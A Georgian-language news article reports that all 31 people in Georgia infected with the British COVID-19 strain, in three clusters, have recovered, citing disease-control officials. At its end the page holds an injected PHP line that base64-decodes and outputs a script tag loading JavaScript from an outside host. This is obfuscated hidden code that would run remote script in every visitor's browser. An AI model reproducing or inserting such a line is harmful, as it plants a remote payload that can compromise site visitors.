celsiusi
ავერსი საქკაბელი
როგორც დაავადებათა კონტროლის ცენტრის ხელმძღვანელის მოეადგილემ პაატა იმნაძემ საინფორმაციო სააგენტო “Business Time”-თან საუბარში განაცხადა, ამ დროისთვის ბრიტანული შტამით ინფიცირებული ყველა პაციენტი გამოჯანმრთელებულია. 
 
"ბრიტანული შტამით ინფიცირებული პაციენტების მდგომარეობა მძიმე არ ყოფილა. 3 შემთხვევის კლასტერები იყვნენ, სულ  ბრიტანული შტამით ინფიცირებული იყო 31 ადამიანი. ყველა გამოჯანმრთელდა", - განუცხადა “Business Time”-ს პაატა იმნაძემ. 
 
აღსანიშნავია, რომ დაავადებათა კონტროლის ეროვნული ცენტრის ხელმძღვანელის, ამირან გამყრელიძის ინფორმაციით, საქართველოში ე.წ. ბრიტანული შტამის გავრცელების რისკია.
მისივე განცხადებით, ქვეყანაში ე.წ. ბრიტანული შტამი სულ 31 ადამიანს დაუდასტურდა.
 
„დადასტურებულია, რომ სამი კლასტერი არის ბრიტანული შტამით. აქედან ორი იმპორტირებული შემთხვევაა, ერთზე მიმდინარეობს კვლევა. ამ სამ კლასტერში სულ 31 ადამიანია. დიდი ალბათობით ყველა ეს 31 შემთხვევა არის მუტირებული შტამით გამოწვეული, მაგრამ კლინიკურად არც ერთი არ არის მძიმე.
 
 
1708
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");